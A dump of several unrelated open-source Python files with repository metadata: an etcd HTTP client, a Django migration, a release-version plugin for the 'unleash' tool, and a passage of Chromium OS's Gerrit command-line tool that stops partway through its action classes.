"repo_name": "CyanogenMod/android_external_chromium_org",
"id": "fabe2daa0008874928d3ddec526cc842f23acf37",
"size": "32327",
"binary": false,
"copies": "8",
"ref": "refs/heads/cm-12.0",
"path": "tools/idl_parser/idl_parser.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "6973"
},
{
"name": "Assembly",
"bytes": "24741"
},
{
"name": "Batchfile",
"bytes": "7204"
},
{
"name": "C",
"bytes": "3593661"
},
{
"name": "C++",
"bytes": "200786844"
},
{
"name": "CSS",
"bytes": "847454"
},
{
"name": "HTML",
"bytes": "17248776"
},
{
"name": "Java",
"bytes": "5192594"
},
{
"name": "JavaScript",
"bytes": "10985195"
},
{
"name": "Makefile",
"bytes": "20865646"
},
{
"name": "Objective-C",
"bytes": "1135377"
},
{
"name": "Objective-C++",
"bytes": "7082902"
},
{
"name": "PHP",
"bytes": "61320"
},
{
"name": "PLpgSQL",
"bytes": "141320"
},
{
"name": "Perl",
"bytes": "69392"
},
{
"name": "Protocol Buffer",
"bytes": "360984"
},
{
"name": "Python",
"bytes": "6377861"
},
{
"name": "Rebol",
"bytes": "262"
},
{
"name": "Shell",
"bytes": "467517"
},
{
"name": "Standard ML",
"bytes": "1589"
},
{
"name": "XSLT",
"bytes": "418"
},
{
"name": "nesC",
"bytes": "15206"
}
],
"symlink_target": ""
}
|
import requests
import simplejson as json
from requests.auth import HTTPBasicAuth
from configs import etcd_config
class Etcd(object):
    """Minimal client for the etcd v2 HTTP keys API.

    The endpoint and optional basic-auth credentials are looked up in
    ``etcd_config`` by room name.  Every method raises
    ``requests.HTTPError`` on a non-2xx response and returns the decoded
    JSON response body.
    """

    def __init__(self, room):
        config = etcd_config.get(room)
        user = config.get('username')
        # BUG FIX: the password was previously read from the 'username'
        # key, so HTTP basic auth always sent the username as the password.
        password = config.get('password')
        endpoint = config.get('endpoint')
        if user and password:
            auth = HTTPBasicAuth(user, password)
        else:
            auth = None
        self.endpoint = endpoint
        self.auth = auth

    def set(self, key, value, ttl=None):
        """Set `key` to `value`, optionally expiring after `ttl` seconds."""
        uri = '%s/v2/keys/%s' % (self.endpoint, key)
        data = {'value': value}
        if ttl is not None:
            data['ttl'] = ttl
        res = requests.put(uri, data=data, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)

    def append(self, key, value, ttl=None):
        """Create an in-order key under directory `key` (etcd POST)."""
        uri = '%s/v2/keys/%s' % (self.endpoint, key)
        data = {'value': value}
        if ttl is not None:
            data['ttl'] = ttl
        res = requests.post(uri, data=data, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)

    def mkdir(self, key, ttl=None):
        """Create directory `key`, optionally expiring after `ttl` seconds."""
        uri = '%s/v2/keys/%s' % (self.endpoint, key)
        data = {'dir': True}
        if ttl is not None:
            data['ttl'] = ttl
        res = requests.put(uri, data=data, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)

    def rmdir(self, key, recursive=False):
        """Delete directory `key`; `recursive` also removes its contents."""
        uri = '%s/v2/keys/%s?dir=true&recursive=%s' % (
            self.endpoint,
            key,
            'true' if recursive else 'false', )
        res = requests.delete(uri, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)

    def get(self, key, recursive=False):
        """Read `key`; `recursive` expands directory children."""
        uri = '%s/v2/keys/%s?recursive=%s' % (
            self.endpoint,
            key,
            'true' if recursive else 'false', )
        res = requests.get(uri, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)

    def wait(self, key, recursive=False):
        """Long-poll for the next change to `key` (etcd watch)."""
        uri = '%s/v2/keys/%s?wait=true&recursive=%s' % (
            self.endpoint,
            key,
            'true' if recursive else 'false', )
        res = requests.get(uri, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)

    def get_all(self, key):
        """Return the list of child nodes under `key` ([] when empty)."""
        uri = '%s/v2/keys/%s' % (self.endpoint, key)
        res = requests.get(uri, auth=self.auth)
        res.raise_for_status()
        data = json.loads(res.text)
        return data['node'].get('nodes', [])

    def delete(self, key):
        """Delete the value stored at `key`."""
        uri = '%s/v2/keys/%s' % (self.endpoint, key)
        res = requests.delete(uri, auth=self.auth)
        res.raise_for_status()
        return json.loads(res.text)
|
{
"content_hash": "26bc9127d5a07dae0aa2d092560b5881",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 59,
"avg_line_length": 31.07777777777778,
"alnum_prop": 0.5520200214515553,
"repo_name": "xiaomatech/ops",
"id": "506febed0a723a56d0c3c2db318b6fa8e8d27cc1",
"size": "2842",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "library/etcd.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1104608"
},
{
"name": "Shell",
"bytes": "11290"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds created_at/modified_at
    # timestamp fields to ContentChannel and ContentChannelRun, and marks
    # 'created_at' as the get_latest_by ordering hint for both models.
    # The timezone.now default on created_at exists only to backfill
    # existing rows; preserve_default=False drops it afterwards.

    dependencies = [
        ('runs', '0002_auto_20170608_1312'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='contentchannel',
            options={'get_latest_by': 'created_at'},
        ),
        migrations.AlterModelOptions(
            name='contentchannelrun',
            options={'get_latest_by': 'created_at'},
        ),
        migrations.AddField(
            model_name='contentchannel',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='contentchannel',
            name='modified_at',
            field=models.DateTimeField(auto_now=True),
        ),
        migrations.AddField(
            model_name='contentchannelrun',
            name='created_at',
            field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='contentchannelrun',
            name='modified_at',
            field=models.DateTimeField(auto_now=True),
        ),
    ]
|
{
"content_hash": "6767beb3f3474421b83f04f552f2e3c5",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 93,
"avg_line_length": 30.772727272727273,
"alnum_prop": 0.5790251107828656,
"repo_name": "ivanistheone/waiter",
"id": "bd3e29c1bb651ef1136e1798fb44eb655e9f3755",
"size": "1427",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runs/migrations/0003_auto_20170612_1829.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9031"
},
{
"name": "HTML",
"bytes": "33583"
},
{
"name": "JavaScript",
"bytes": "9165"
},
{
"name": "Nginx",
"bytes": "998"
},
{
"name": "Python",
"bytes": "109970"
},
{
"name": "Shell",
"bytes": "8039"
}
],
"symlink_target": ""
}
|
from click import Option
from versio.version import Version
from unleash import log, opts, issues, commit, info
from .utils_assign import find_assign, replace_assign
from .utils_tree import require_file
PLUGIN_NAME = 'versions'
def require_setup_py():
    """Return the contents of setup.py, or report an error if it is missing.

    Delegates to require_file, which raises/records the issue when the file
    is not present in the repository root.
    """
    # BUG FIX: corrected typos in the user-facing message
    # ("could not determined" -> "could not be determined",
    #  "explicity" -> "explicitly").
    return require_file(
        'setup.py', 'No setup.py found',
        'The version could not be determined because no setup.py file was '
        'found. Either supply a release version explicitly or make sure '
        'setup.py exists in the root of the repository.')
def setup(cli):
    # Plugin hook: register version-related options on the unleash CLI.
    # The 'release' command gains --dev-version/--release-version; the
    # top-level CLI gains a repeatable --package-dir option used to locate
    # package __init__.py files.
    cli.commands['release'].params.append(Option(
        ['--dev-version', '-d'],
        help='Set new development version to this. If not given, '
        'auto-increment the release-version.'))
    cli.commands['release'].params.append(Option(
        ['--release-version', '-v'],
        help='Set the release version to this. If not given, will be '
        'auto-detected from setup.py.'))
    cli.params.append(Option(
        ['--package-dir', '-p'],
        multiple=True,
        help='Directories in which packages can be found (used to update '
        '__version__ variables. Can be given multiple times.'))
def _shorten_version(version):
    # Reduce a version to its release component only, e.g.
    # '1.2.3.dev4' -> '1.2.3'.
    # NOTE(review): relies on Versio's internal 5-slot `parts` layout
    # (release part first) -- confirm against the versio package.
    v = Version(str(version))
    v.parts = [v.parts[0]] + [None] * 4
    return v
def _set_commit_version(version):
    # Write |version| into setup.py and into every package __init__.py
    # recorded in info['init_files'], staging the edits on the pending
    # commit object.
    # Steps
    # 1. Replace commit message
    # 2. Replace version in setup.py
    # 3. Replace version in PKGNAME/__init__.py
    setup_py = require_setup_py()
    log.info('Updating setup.py and package version ({})'.format(version))
    # update setup.py
    commit.set_path_data('setup.py', replace_assign(setup_py,
                                                    'version',
                                                    version, ))
    # update PKGNAME/__init__.py files
    for fn in info['init_files']:
        # replace version info
        commit.set_path_data(fn, replace_assign(
            commit.get_path_data(fn),
            '__version__',
            version, ))
def collect_info():
    """Determine release/dev versions and package metadata for the release.

    Populates info['pkg_name'], info['release_version'], info['dev_version'],
    their *_short variants, and info['init_files'], reading the optional
    --release-version/--dev-version/--package-dir command-line options.
    """
    release_version = opts.get('release_version')
    dev_version = opts.get('dev_version')
    setup_py = require_setup_py()
    try:
        if release_version is None:
            # try extracting version info
            try:
                release_version = find_assign(setup_py, 'version')
            except ValueError as e:
                issues.error(
                    e, 'There was an issue extracting the version number from '
                    'setup.py. Please make sure there is only a single '
                    'version= assignment in that file.')
            log.debug('Release version automatically determined from setup.py')
        else:
            log.debug('Release version given on commandline.')
        # parse release version string
        release_version = _shorten_version(release_version)
        if dev_version is None:
            # if we're given no dev version, we try to create one by
            # incrementing the release version
            dev_version = Version(str(release_version))
            dev_version.bump('release')
            dev_version.bump('dev')
        else:
            # parse dev version string
            dev_version = Version(dev_version)
    except TypeError as e:
        issues.error(
            'Bad version number: {}'.format(e),
            'The version number "{}" is not a version number that can be '
            'understood by distutils.\n\n'
            'Please correct the different version number and try again.'
            .format(e))
    # get package name
    try:
        pkg_name = find_assign(setup_py, 'name')
    except ValueError as e:
        issues.error(
            e,
            'Could not extract package name from setup.py. Please make sure '
            'there is only a single name= expression in that file.')
    info['pkg_name'] = pkg_name
    info['release_version'] = str(release_version)
    info['dev_version'] = str(dev_version)
    # create the short versions
    info['release_version_short'] = str(_shorten_version(release_version))
    info['dev_version_short'] = str(_shorten_version(dev_version))
    # use provided package dirs or auto-detected one from setup.py
    pkg_paths = set(opts['package_dir'])
    if not pkg_paths:
        pkg_paths = set([info['pkg_name'], info['pkg_name'].replace('-', '_')])
    log.debug('Package paths: {}'.format(pkg_paths))
    init_files = [path + '/__init__.py' for path in pkg_paths]
    # BUG FIX: on Python 3, filter() returns a lazy iterator that is always
    # truthy, so the "no __init__.py files" warning below could never fire
    # and the iterator would be exhausted after first use.  Materialize it
    # as a list (identical behavior on Python 2).
    init_files = [fn for fn in init_files if commit.path_exists(fn)]
    if not init_files:
        issues.warn(
            'No __init__.py files found for packages.',
            'While looking for package __init__.py files to update version '
            'information in, none were found. This most often happens if your '
            'package contains only modules or is not named after its primary '
            'Python package.')
    info['init_files'] = init_files
def prepare_release():
    # Plugin hook: rewrite the pending commit as the release commit.
    # update commit message
    commit.message = u'Release version {}'.format(info['release_version'])
    _set_commit_version(info['release_version'])
def prepare_dev():
    # Plugin hook: follow-up commit that starts the next development cycle.
    commit.message = (u'Start developing version {} (after release of {})'
                      .format(info['dev_version'], info['release_version']))
    _set_commit_version(info['dev_version'])
|
{
"content_hash": "034a44cc085916c7b65d82f570d11244",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 79,
"avg_line_length": 34.05095541401274,
"alnum_prop": 0.5974560419004863,
"repo_name": "mbr/unleash",
"id": "b41714bede5bf27ebc69d812cae46ba8d88d4c35",
"size": "5346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "unleash/plugins/versions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "73221"
}
],
"symlink_target": ""
}
|
"""A command line interface to Gerrit-on-borg instances.
Internal Note:
To expose a function directly to the command line interface, name your function
with the prefix "UserAct".
"""
from __future__ import print_function
import collections
import functools
import inspect
import json
import re
import sys
from chromite.lib import config_lib
from chromite.lib import constants
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import cros_logging as logging
from chromite.lib import gerrit
from chromite.lib import gob_util
from chromite.lib import parallel
from chromite.lib import terminal
from chromite.lib import uri_lib
from chromite.utils import memoize
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
class UserAction(object):
  """Base class for all custom user actions."""

  # The name of the command the user types in.
  COMMAND = None

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    # Default: no extra arguments; subclasses override as needed.

  @staticmethod
  def __call__(opts):
    """Implement the action."""
    # Subclasses must override; reaching this indicates a coding error.
    raise RuntimeError('Internal error: action missing __call__ implementation')
# How many connections we'll use in parallel. We don't want this to be too high
# so we don't go over our per-user quota. Pick 10 somewhat arbitrarily as that
# seems to be good enough for users.
CONNECTION_LIMIT = 10


# Shared terminal color helper used by red()/green()/blue() below.
# NOTE(review): presumably assigned at startup before any printing -- confirm.
COLOR = None

# Map the internal names to the ones we normally show on the web ui.
GERRIT_APPROVAL_MAP = {
    'COMR': ['CQ', 'Commit Queue ',],
    'CRVW': ['CR', 'Code Review ',],
    'SUBM': ['S ', 'Submitted ',],
    'VRIF': ['V ', 'Verified ',],
    'LCQ': ['L ', 'Legacy ',],
}

# Order is important -- matches the web ui. This also controls the short
# entries that we summarize in non-verbose mode.
GERRIT_SUMMARY_CATS = ('CR', 'CQ', 'V',)

# Shorter strings for CL status messages.
GERRIT_SUMMARY_MAP = {
    'ABANDONED': 'ABD',
    'MERGED': 'MRG',
    'NEW': 'NEW',
    'WIP': 'WIP',
}
def red(s):
  """Wrap |s| in terminal color codes for red text."""
  return COLOR.Color(terminal.Color.RED, s)
def green(s):
  """Wrap |s| in terminal color codes for green text."""
  return COLOR.Color(terminal.Color.GREEN, s)
def blue(s):
  """Wrap |s| in terminal color codes for blue text."""
  return COLOR.Color(terminal.Color.BLUE, s)
def _run_parallel_tasks(task, *args):
  """Small wrapper around BackgroundTaskRunner to enforce job count."""
  # Each element of |args| becomes one queued invocation task(arg), with at
  # most CONNECTION_LIMIT of them running concurrently.
  with parallel.BackgroundTaskRunner(task, processes=CONNECTION_LIMIT) as q:
    for arg in args:
      q.put([arg])
def limits(cls):
  """Given a dict of fields, calculate the longest string lengths

  This allows you to easily format the output of many results so that the
  various cols all line up correctly.
  """
  widths = {}
  for record in cls:
    for field, value in record.items():
      # Use %s rather than str() to avoid codec issues.
      # We also do this so we can format integers.
      rendered = '%s' % (value,)
      if len(rendered) > widths.get(field, 0):
        widths[field] = len(rendered)
  return widths
# TODO: This func really needs to be merged into the core gerrit logic.
def GetGerrit(opts, cl=None):
  """Auto pick the right gerrit instance based on the |cl|

  Args:
    opts: The general options object.
    cl: A CL taking one of the forms: 1234 *1234 chromium:1234

  Returns:
    A tuple of a gerrit object and a sanitized CL #.
  """
  gob = opts.gob
  if cl is not None:
    if cl.startswith('*') or cl.startswith('chrome-internal:'):
      # Both markers select the internal instance; strip the marker
      # ('*' is one char, 'chrome-internal:' is sixteen).
      gob = config_lib.GetSiteParams().INTERNAL_GOB_INSTANCE
      if cl.startswith('*'):
        cl = cl[1:]
      else:
        cl = cl[16:]
    elif ':' in cl:
      # Explicit "<instance>:<number>" override.
      gob, cl = cl.split(':', 1)

  # Cache one helper per instance on opts so connections are reused.
  if not gob in opts.gerrit:
    opts.gerrit[gob] = gerrit.GetGerritHelper(gob=gob, print_cmd=opts.debug)

  return (opts.gerrit[gob], cl)
def GetApprovalSummary(_opts, cls):
  """Return a dict of the most important approvals"""
  summary = {cat: '' for cat in GERRIT_SUMMARY_CATS}
  for approval in cls.get('currentPatchSet', {}).get('approvals', []):
    mapped = GERRIT_APPROVAL_MAP.get(approval['type'])
    if not mapped:
      logging.warning('unknown gerrit approval type: %s', approval['type'])
      continue
    category = mapped[0].strip()
    score = int(approval['value'])
    if category not in summary:
      # Ignore the extended categories in the summary view.
      continue
    if summary[category] == '':
      # First vote seen for this category.
      summary[category] = score
    elif score < 0:
      # Negative votes dominate: keep the worst one seen so far.
      summary[category] = min(summary[category], score)
    else:
      summary[category] = max(summary[category], score)
  return summary
def PrettyPrintCl(opts, cl, lims=None, show_approvals=True):
  """Pretty print a single result"""
  if lims is None:
    lims = {'url': 0, 'project': 0}

  status = ''

  # Verbose mode shows the full status name; otherwise use the short form.
  if opts.verbose:
    status += '%s ' % (cl['status'],)
  else:
    status += '%s ' % (GERRIT_SUMMARY_MAP.get(cl['status'], cl['status']),)

  if show_approvals and not opts.verbose:
    # Summarize each label as e.g. "CR: 2", colored by the vote's sign.
    approvs = GetApprovalSummary(opts, cl)
    for cat in GERRIT_SUMMARY_CATS:
      if approvs[cat] in ('', 0):
        functor = lambda x: x
      elif approvs[cat] < 0:
        functor = red
      else:
        functor = green
      status += functor('%s:%2s ' % (cat, approvs[cat]))

  print('%s %s%-*s %s' % (blue('%-*s' % (lims['url'], cl['url'])), status,
                          lims['project'], cl['project'], cl['subject']))

  if show_approvals and opts.verbose:
    # Verbose mode: one line per individual vote with the approver's email.
    for approver in cl['currentPatchSet'].get('approvals', []):
      functor = red if int(approver['value']) < 0 else green
      n = functor('%2s' % approver['value'])
      t = GERRIT_APPROVAL_MAP.get(approver['type'], [approver['type'],
                                                     approver['type']])[1]
      print(' %s %s %s' % (n, t, approver['by']['email']))
def PrintCls(opts, cls, lims=None, show_approvals=True):
  """Print all results based on the requested format."""
  if opts.raw:
    # Raw mode: one CL number per line, suitable for piping to other tools.
    site_params = config_lib.GetSiteParams()
    pfx = ''
    # Special case internal Chrome GoB as that is what most devs use.
    # They can always redirect the list elsewhere via the -g option.
    if opts.gob == site_params.INTERNAL_GOB_INSTANCE:
      pfx = site_params.INTERNAL_CHANGE_PREFIX
    for cl in cls:
      print('%s%s' % (pfx, cl['number']))

  elif opts.json:
    json.dump(cls, sys.stdout)

  else:
    # Human-readable table; compute column widths once for all rows.
    if lims is None:
      lims = limits(cls)

    for cl in cls:
      PrettyPrintCl(opts, cl, lims=lims, show_approvals=show_approvals)
def _Query(opts, query, raw=True, helper=None):
"""Queries Gerrit with a query string built from the commandline options"""
if opts.branch is not None:
query += ' branch:%s' % opts.branch
if opts.project is not None:
query += ' project: %s' % opts.project
if opts.topic is not None:
query += ' topic: %s' % opts.topic
if helper is None:
helper, _ = GetGerrit(opts)
return helper.Query(query, raw=raw, bypass_cache=False)
def FilteredQuery(opts, query, helper=None):
  """Query gerrit and filter/clean up the results"""
  ret = []

  logging.debug('Running query: %s', query)
  for cl in _Query(opts, query, raw=True, helper=helper):
    # Gerrit likes to return a stats record too.
    if not 'project' in cl:
      continue

    # Strip off common leading names since the result is still
    # unique over the whole tree.
    if not opts.verbose:
      for pfx in ('aosp', 'chromeos', 'chromiumos', 'external', 'overlays',
                  'platform', 'third_party'):
        if cl['project'].startswith('%s/' % pfx):
          cl['project'] = cl['project'][len(pfx) + 1:]

    # Shorten the URL to its friendlier display form.
    cl['url'] = uri_lib.ShortenUri(cl['url'])

    ret.append(cl)

  if opts.sort == 'unsorted':
    return ret
  if opts.sort == 'number':
    # CL numbers are numeric strings; sort them as ints, not lexically.
    key = lambda x: int(x[opts.sort])
  else:
    key = lambda x: x[opts.sort]
  return sorted(ret, key=key)
class _ActionSearchQuery(UserAction):
  """Base class for actions that perform searches."""

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    # Common filters shared by every search-style subcommand.
    parser.add_argument('--sort', default='number',
                        help='Key to sort on (number, project); use "unsorted" '
                             'to disable')
    parser.add_argument('-b', '--branch',
                        help='Limit output to the specific branch')
    parser.add_argument('-p', '--project',
                        help='Limit output to the specific project')
    parser.add_argument('-t', '--topic',
                        help='Limit output to the specific topic')
class ActionTodo(_ActionSearchQuery):
  """List CLs needing your review"""

  COMMAND = 'todo'

  @staticmethod
  def __call__(opts):
    """Implement the action."""
    # Open CLs where we are a reviewer (but not the owner) and have not
    # voted yet, skipping anything that already failed verification.
    cls = FilteredQuery(opts, ('reviewer:self status:open NOT owner:self '
                               'label:Code-Review=0,user=self '
                               'NOT label:Verified<0'))
    PrintCls(opts, cls)
class ActionSearch(_ActionSearchQuery):
  """List CLs matching the search query"""

  COMMAND = 'search'

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    _ActionSearchQuery.init_subparser(parser)
    parser.add_argument('query',
                        help='The search query')

  @staticmethod
  def __call__(opts):
    """Implement the action."""
    # The user's raw gerrit query is passed through unchanged.
    cls = FilteredQuery(opts, opts.query)
    PrintCls(opts, cls)
class ActionMine(_ActionSearchQuery):
  """List your CLs with review statuses"""

  COMMAND = 'mine'

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    _ActionSearchQuery.init_subparser(parser)
    parser.add_argument('--draft', default=False, action='store_true',
                        help='Show draft changes')

  @staticmethod
  def __call__(opts):
    """Implement the action."""
    # Select drafts or open changes depending on --draft.
    rule = 'is:draft' if opts.draft else 'status:new'
    results = FilteredQuery(opts, 'owner:self %s' % (rule,))
    PrintCls(opts, results)
def _BreadthFirstSearch(to_visit, children, visited_key=lambda x: x):
"""Runs breadth first search starting from the nodes in |to_visit|
Args:
to_visit: the starting nodes
children: a function which takes a node and returns the nodes adjacent to it
visited_key: a function for deduplicating node visits. Defaults to the
identity function (lambda x: x)
Returns:
A list of nodes which are reachable from any node in |to_visit| by calling
|children| any number of times.
"""
to_visit = list(to_visit)
seen = set(visited_key(x) for x in to_visit)
for node in to_visit:
for child in children(node):
key = visited_key(child)
if key not in seen:
seen.add(key)
to_visit.append(child)
return to_visit
class ActionDeps(_ActionSearchQuery):
  """List CLs matching a query, and all transitive dependencies of those CLs"""

  COMMAND = 'deps'

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    _ActionSearchQuery.init_subparser(parser)
    parser.add_argument('query',
                        help='The search query')

  def __call__(self, opts):
    """Implement the action."""
    cls = _Query(opts, opts.query, raw=False)

    # Memoized so repeatedly hitting the same dependency costs one query.
    @memoize.Memoize
    def _QueryChange(cl, helper=None):
      return _Query(opts, cl, raw=False, helper=helper)

    # Walk the dependency graph breadth-first, deduplicating by CL number.
    transitives = _BreadthFirstSearch(
        cls, functools.partial(self._Children, opts, _QueryChange),
        visited_key=lambda cl: cl.gerrit_number)

    transitives_raw = [cl.patch_dict for cl in transitives]
    PrintCls(opts, transitives_raw)

  @staticmethod
  def _ProcessDeps(opts, querier, cl, deps, required):
    """Yields matching dependencies for a patch"""
    # We need to query the change to guarantee that we have a .gerrit_number
    for dep in deps:
      # Each dependency may live on a different gerrit remote; cache a
      # helper per remote on opts.
      if not dep.remote in opts.gerrit:
        opts.gerrit[dep.remote] = gerrit.GetGerritHelper(
            remote=dep.remote, print_cmd=opts.debug)
      helper = opts.gerrit[dep.remote]

      # TODO(phobbs) this should maybe catch network errors.
      changes = querier(dep.ToGerritQueryText(), helper=helper)

      # Handle empty results.  If we found a commit that was pushed directly
      # (e.g. a bot commit), then gerrit won't know about it.
      if not changes:
        if required:
          logging.error('CL %s depends on %s which cannot be found',
                        cl, dep.ToGerritQueryText())
        continue

      # Our query might have matched more than one result.  This can come up
      # when CQ-DEPEND uses a Gerrit Change-Id, but that Change-Id shows up
      # across multiple repos/branches.  We blindly check all of them in the
      # hopes that all open ones are what the user wants, but then again the
      # CQ-DEPEND syntax itself is unable to differentiate.  *shrug*
      if len(changes) > 1:
        logging.warning('CL %s has an ambiguous CQ dependency %s',
                        cl, dep.ToGerritQueryText())
      for change in changes:
        if change.status == 'NEW':
          yield change

  @classmethod
  def _Children(cls, opts, querier, cl):
    """Yields the Gerrit and CQ-Depends dependencies of a patch"""
    # CQ-DEPEND entries are required (missing ones are an error); plain
    # Gerrit parent dependencies are best-effort.
    for change in cls._ProcessDeps(
        opts, querier, cl, cl.PaladinDependencies(None), True):
      yield change
    for change in cls._ProcessDeps(
        opts, querier, cl, cl.GerritDependencies(), False):
      yield change
class ActionInspect(_ActionSearchQuery):
  """Show the details of one or more CLs"""

  COMMAND = 'inspect'

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    _ActionSearchQuery.init_subparser(parser)
    parser.add_argument('cls', nargs='+', metavar='CL',
                        help='The CL(s) to update')

  @staticmethod
  def __call__(opts):
    """Implement the action."""
    cls = []
    for arg in opts.cls:
      # Each CL may name a different gerrit instance (e.g. '*1234').
      helper, cl = GetGerrit(opts, arg)
      change = FilteredQuery(opts, 'change:%s' % cl, helper=helper)
      if change:
        cls.extend(change)
      else:
        logging.warning('no results found for CL %s', arg)
    PrintCls(opts, cls)
class _ActionLabeler(UserAction):
  """Base helper for setting labels."""

  # Subclasses define the gerrit label name and the allowed vote values.
  LABEL = None
  VALUES = None

  @classmethod
  def init_subparser(cls, parser):
    """Add arguments to this action's subparser."""
    parser.add_argument('--ne', '--no-emails', dest='notify',
                        default='ALL', action='store_const', const='NONE',
                        help='Do not send e-mail notifications')
    parser.add_argument('-m', '--msg', '--message', metavar='MESSAGE',
                        help='Optional message to include')
    parser.add_argument('cls', nargs='+', metavar='CL',
                        help='The CL(s) to update')
    parser.add_argument('value', nargs=1, metavar='value', choices=cls.VALUES,
                        help='The label value; one of [%(choices)s]')

  @classmethod
  def __call__(cls, opts):
    """Implement the action."""
    # Convert user friendly command line option into a gerrit parameter.
    def task(arg):
      # Runs once per CL, fanned out by _run_parallel_tasks.
      helper, cl = GetGerrit(opts, arg)
      helper.SetReview(cl, labels={cls.LABEL: opts.value[0]}, msg=opts.msg,
                       dryrun=opts.dryrun, notify=opts.notify)
    _run_parallel_tasks(task, *opts.cls)
class ActionLabelAutoSubmit(_ActionLabeler):
  """Change the Auto-Submit label"""

  COMMAND = 'label-as'
  LABEL = 'Auto-Submit'
  # Allowed votes: 0 (clear) or 1 (set).
  VALUES = ('0', '1')
class ActionLabelCodeReview(_ActionLabeler):
  """Change the Code-Review label (1=LGTM 2=LGTM+Approved)"""

  COMMAND = 'label-cr'
  LABEL = 'Code-Review'
  # Full gerrit vote range, -2 (veto) through +2 (approved).
  VALUES = ('-2', '-1', '0', '1', '2')
class ActionLabelVerified(_ActionLabeler):
  """Change the Verified label"""

  COMMAND = 'label-v'
  LABEL = 'Verified'
  # Allowed votes: -1 (fails), 0 (clear), 1 (verified).
  VALUES = ('-1', '0', '1')
class ActionLabelCommitQueue(_ActionLabeler):
  """Change the Commit-Queue label (1=dry-run 2=commit)"""

  COMMAND = 'label-cq'
  LABEL = 'Commit-Queue'
  # Per the docstring: 0 clears, 1 requests a dry-run, 2 requests commit.
  VALUES = ('0', '1', '2')
class _ActionSimpleParallelCLs(UserAction):
  """Base helper for actions that only accept CLs."""

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    parser.add_argument('cls', nargs='+', metavar='CL',
                        help='The CL(s) to update')

  def __call__(self, opts):
    """Implement the action."""
    # Fan the CLs out in parallel to _process_one (defined by subclasses).
    def task(arg):
      helper, cl = GetGerrit(opts, arg)
      self._process_one(helper, cl, opts)
    _run_parallel_tasks(task, *opts.cls)
class ActionSubmit(_ActionSimpleParallelCLs):
  """Submit CLs"""

  COMMAND = 'submit'

  @staticmethod
  def _process_one(helper, cl, opts):
    """Use |helper| to process the single |cl|."""
    # Submits the change; honors --dryrun.
    helper.SubmitChange(cl, dryrun=opts.dryrun)
class ActionAbandon(_ActionSimpleParallelCLs):
  """Abandon CLs"""

  COMMAND = 'abandon'

  @staticmethod
  def _process_one(helper, cl, opts):
    """Use |helper| to process the single |cl|."""
    # Abandons the change; honors --dryrun.
    helper.AbandonChange(cl, dryrun=opts.dryrun)
class ActionRestore(_ActionSimpleParallelCLs):
  """Restore CLs that were abandoned"""

  COMMAND = 'restore'

  @staticmethod
  def _process_one(helper, cl, opts):
    """Use |helper| to process the single |cl|."""
    # Restores a previously abandoned change; honors --dryrun.
    helper.RestoreChange(cl, dryrun=opts.dryrun)
class ActionReviewers(UserAction):
  """Add/remove reviewers' emails for a CL (prepend with '~' to remove)"""

  COMMAND = 'reviewers'

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    parser.add_argument('--ne', '--no-emails', dest='notify',
                        default='ALL', action='store_const', const='NONE',
                        help='Do not send e-mail notifications')
    parser.add_argument('cl', metavar='CL',
                        help='The CL to update')
    parser.add_argument('reviewers', nargs='+',
                        help='The reviewers to add/remove')

  @staticmethod
  def __call__(opts):
    """Implement the action."""
    # Allow for optional leading '~'.
    email_validator = re.compile(r'^[~]?%s$' % constants.EMAIL_REGEX)
    add_list, remove_list, invalid_list = [], [], []

    # Partition the requested reviewers into adds, removals and typos.
    for email in opts.reviewers:
      if not email_validator.match(email):
        invalid_list.append(email)
      elif email[0] == '~':
        remove_list.append(email[1:])
      else:
        add_list.append(email)

    if invalid_list:
      cros_build_lib.Die(
          'Invalid email address(es): %s' % ', '.join(invalid_list))

    if add_list or remove_list:
      helper, cl = GetGerrit(opts, opts.cl)
      helper.SetReviewers(cl, add=add_list, remove=remove_list,
                          dryrun=opts.dryrun, notify=opts.notify)
class ActionAssign(_ActionSimpleParallelCLs):
  """Set the assignee for CLs"""

  COMMAND = 'assign'

  @staticmethod
  def init_subparser(parser):
    """Add arguments to this action's subparser."""
    _ActionSimpleParallelCLs.init_subparser(parser)
    parser.add_argument('assignee',
                        help='The new assignee')

  @staticmethod
  def _process_one(helper, cl, opts):
    """Use |helper| to process the single |cl|."""
    # Applies the same assignee to every listed CL; honors --dryrun.
    helper.SetAssignee(cl, opts.assignee, dryrun=opts.dryrun)
class ActionMessage(_ActionSimpleParallelCLs):
    """Add a message to a CL"""
